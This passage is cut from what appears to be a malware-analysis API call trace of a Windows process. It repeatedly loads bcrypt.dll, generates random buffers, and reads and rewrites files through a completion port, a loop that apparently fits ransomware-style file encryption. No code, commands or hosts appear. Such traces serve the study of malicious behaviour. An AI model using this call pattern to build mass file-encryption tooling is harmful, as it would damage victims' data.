lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.846] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.846] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.846] free (_Block=0x77d800) [0109.846] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.846] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.846] free (_Block=0x1fa4848) [0109.846] free (_Block=0x2071818) [0109.846] free (_Block=0x77d908) [0109.846] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0109.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.850] CloseHandle (hObject=0x3ac) returned 1 [0109.851] free (_Block=0x1ff1e60) [0109.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.858] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.858] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.858] free (_Block=0x77d800) [0109.858] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.858] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.859] free (_Block=0x1fa4848) [0109.859] free (_Block=0x2071818) [0109.859] free (_Block=0x77d908) [0109.859] WriteFile (in: hFile=0x81c, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.902] CloseHandle (hObject=0x81c) returned 1 [0109.908] free (_Block=0x3db00b8) [0109.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.913] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.913] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.931] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8d6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.932] CloseHandle (hObject=0x3ac) returned 1 [0109.936] free (_Block=0x1ff1e60) [0109.936] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.946] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.947] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.947] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.947] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.947] free (_Block=0x77d800) [0109.947] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.947] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.947] free (_Block=0x1fa4848) [0109.948] free (_Block=0x2071818) [0109.948] free (_Block=0x77d908) [0109.948] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.949] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.965] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1496, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.967] CloseHandle (hObject=0x3ac) returned 1 [0109.968] free (_Block=0x1ff1e60) [0109.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.978] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.978] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.978] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.979] free (_Block=0x77d800) [0109.979] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.979] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.979] free (_Block=0x1fa4848) [0109.979] free (_Block=0x2071818) [0109.979] free (_Block=0x77d908) [0109.979] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.981] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc190, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.982] CloseHandle (hObject=0x3ac) returned 1 [0109.983] free (_Block=0x1ff1e60) [0109.983] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.994] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.994] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.994] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.994] free (_Block=0x77d800) [0109.994] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.994] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.995] free (_Block=0x1fa4848) [0109.995] free (_Block=0x2071818) [0109.995] free (_Block=0x77d908) [0109.995] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.995] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.996] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.996] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.012] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2856, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.013] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.013] CloseHandle (hObject=0x3ac) returned 1 [0110.020] free (_Block=0x1ff1e60) [0110.020] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0110.031] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0110.031] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.032] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.032] free (_Block=0x77d800) [0110.032] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.032] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.032] free (_Block=0x1fa4848) [0110.032] free (_Block=0x2071818) [0110.032] free (_Block=0x77d908) [0110.032] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.033] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.034] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x79a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.049] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2040, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.050] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.050] CloseHandle (hObject=0x3ac) returned 1 [0110.051] free (_Block=0x1ff1e60) [0110.051] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.061] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0110.061] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.062] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0110.062] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.062] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.062] free (_Block=0x77d800) [0110.062] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.062] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.063] free (_Block=0x1fa4848) [0110.063] free (_Block=0x2071818) [0110.063] free (_Block=0x77d908) [0110.063] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.063] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.064] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x73c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.085] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa82, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.085] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.086] CloseHandle (hObject=0x3ac) returned 1 [0110.088] free (_Block=0x1ff1e60) [0110.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.097] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.098] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0110.098] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.098] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0110.099] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.099] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.099] free (_Block=0x77d800) [0110.099] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.099] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.099] free (_Block=0x1fa4848) [0110.099] free (_Block=0x2071818) [0110.099] free (_Block=0x77d908) [0110.099] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.100] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.100] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.100] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.163] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x9456, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.176] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x9c5e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.177] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.189] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x318, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.189] CloseHandle (hObject=0x3ac) returned 1 [0110.192] free (_Block=0x1ff1e60) [0110.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0110.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0110.202] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.202] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.202] free (_Block=0x77d800) [0110.202] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.202] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.202] free (_Block=0x1fa4848) [0110.202] free (_Block=0x2071818) [0110.202] free (_Block=0x77d908) [0110.202] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.206] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x44b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0110.220] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1e94, lpNumberOfBytesRead=0x0, 